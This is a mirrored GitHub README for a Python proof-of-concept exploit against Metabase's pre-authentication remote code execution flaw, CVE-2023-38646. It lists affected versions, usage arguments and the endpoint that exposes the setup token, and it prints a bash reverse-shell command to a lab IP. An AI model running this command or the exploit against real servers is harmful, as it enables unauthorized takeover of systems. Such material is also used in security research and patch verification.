Giters

Pyr0sec / CVE-2023-38646

Exploit script for Pre-Auth RCE in Metabase (CVE-2023-38646)

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Metabase Pre-Auth RCE (CVE-2023-38646) POC

This is a python script which exploits the remote code execution vulnerability of Metabase's login software. It allows us to execute arbitrary commands on the server before authentication.

Vulnerable versions are Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1

Usage

python3 exploit.py -u URL -t TOKEN -c COMMAND

Arguments

-h, --help            show this help message and exit
-u URL, --url URL     Target URL
-t TOKEN, --token TOKEN
                      Setup-Token found in /api/session/properties
-c COMMAND, --command COMMAND
                      Command to be executed in the target host

Example

image

Command used: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1

References

Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)

About

Exploit script for Pre-Auth RCE in Metabase (CVE-2023-38646)

License:Apache License 2.0

Languages

Language:Python 100.0%